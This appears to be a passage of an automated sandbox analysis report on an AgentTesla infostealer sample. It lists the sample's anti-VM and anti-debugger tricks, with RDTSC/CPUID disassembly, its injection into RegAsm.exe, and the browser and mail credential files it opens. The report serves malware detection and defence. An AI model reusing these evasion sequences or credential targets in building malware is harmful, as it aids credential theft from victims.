          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130210C 4_2_0130210C
          Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 0000000002102FA2 second address: 0000000002102FA2 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F7E70A9D098h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test bl, dl 0x0000001f cmp eax, ebx 0x00000021 pop ecx 0x00000022 test ebx, ecx 0x00000024 add edi, edx 0x00000026 dec ecx 0x00000027 pushad 0x00000028 mov ah, F0h 0x0000002a cmp ah, FFFFFFF0h 0x0000002d jne 00007F7E70A9C5A5h 0x00000033 popad 0x00000034 cmp ecx, 00000000h 0x00000037 jne 00007F7E70A9D043h 0x00000039 push ecx 0x0000003a jmp 00007F7E70A9D0AAh 0x0000003c push esi 0x0000003d mov esi, 6EF0E26Ch 0x00000042 cmp esi, 6EF0E26Ch 0x00000048 jne 00007F7E70A9A718h 0x0000004e pop esi 0x0000004f call 00007F7E70A9D0E7h 0x00000054 call 00007F7E70A9D0A8h 0x00000059 lfence 0x0000005c mov edx, dword ptr [7FFE0014h] 0x00000062 lfence 0x00000065 ret 0x00000066 mov esi, edx 0x00000068 pushad 0x00000069 rdtsc
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 00000000021006BA second address: 00000000021006BA instructions:
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 0000000002100853 second address: 0000000002100853 instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000001300F6A second address: 0000000001300F6A instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000001301F08 second address: 0000000001301F08 instructions:
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: RegAsm.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 0000000002102FA2 second address: 0000000002102FA2 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F7E70A9D098h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test bl, dl 0x0000001f cmp eax, ebx 0x00000021 pop ecx 0x00000022 test ebx, ecx 0x00000024 add edi, edx 0x00000026 dec ecx 0x00000027 pushad 0x00000028 mov ah, F0h 0x0000002a cmp ah, FFFFFFF0h 0x0000002d jne 00007F7E70A9C5A5h 0x00000033 popad 0x00000034 cmp ecx, 00000000h 0x00000037 jne 00007F7E70A9D043h 0x00000039 push ecx 0x0000003a jmp 00007F7E70A9D0AAh 0x0000003c push esi 0x0000003d mov esi, 6EF0E26Ch 0x00000042 cmp esi, 6EF0E26Ch 0x00000048 jne 00007F7E70A9A718h 0x0000004e pop esi 0x0000004f call 00007F7E70A9D0E7h 0x00000054 call 00007F7E70A9D0A8h 0x00000059 lfence 0x0000005c mov edx, dword ptr [7FFE0014h] 0x00000062 lfence 0x00000065 ret 0x00000066 mov esi, edx 0x00000068 pushad 0x00000069 rdtsc
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 000000000210319A second address: 000000000210319A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F7E70AAA270h 0x0000001d popad 0x0000001e jmp 00007F7E70AA7922h 0x00000020 test ax, dx 0x00000023 call 00007F7E70AA7934h 0x00000028 lfence 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 00000000021006BA second address: 00000000021006BA instructions:
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 0000000002100853 second address: 0000000002100853 instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 000000000130319A second address: 000000000130319A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F7E70A9FA00h 0x0000001d popad 0x0000001e jmp 00007F7E70A9D0B2h 0x00000020 test ax, dx 0x00000023 call 00007F7E70A9D0C4h 0x00000028 lfence 0x0000002b rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000001300F6A second address: 0000000001300F6A instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000001301F08 second address: 0000000001301F08 instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130210C rdtsc 4_2_0130210C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2357Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7483Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6904Thread sleep time: -25825441703193356s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: RegAsm.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130210C rdtsc 4_2_0130210C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FE6B68 LdrInitializeThunk,4_2_00FE6B68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_013052A0 mov eax, dword ptr fs:[00000030h]4_2_013052A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01302DD2 mov eax, dword ptr fs:[00000030h]4_2_01302DD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01305F0E mov eax, dword ptr fs:[00000030h]4_2_01305F0E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130576C mov eax, dword ptr fs:[00000030h]4_2_0130576C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01305EF3 mov eax, dword ptr fs:[00000030h]4_2_01305EF3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1300000Jump to behavior
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe' Jump to behavior
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01302214 cpuid 4_2_01302214
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Virtualization/Sandbox Evasion34OS Credential Dumping1Security Software Discovery731Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion34Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery424SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet